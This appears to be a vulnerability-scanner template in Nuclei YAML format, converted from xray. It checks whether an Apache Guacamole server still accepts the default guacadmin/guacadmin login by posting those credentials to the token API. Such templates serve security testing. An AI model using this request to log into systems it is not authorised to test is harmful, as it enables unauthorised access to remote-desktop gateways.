id: poc-yaml-apache-guacamole-default-password

info:
  name: poc-yaml-apache-guacamole-default-password
  author: For3stCo1d (https://github.com/For3stCo1d)
  severity: high
  tags: xray-converted,ct-442587
  reference:
    - https://sourceforge.net/p/guacamole/discussion/1110834/thread/f0249e64/

http:
  - raw:
      - |
        POST /api/tokens HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=guacadmin&password=guacadmin

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200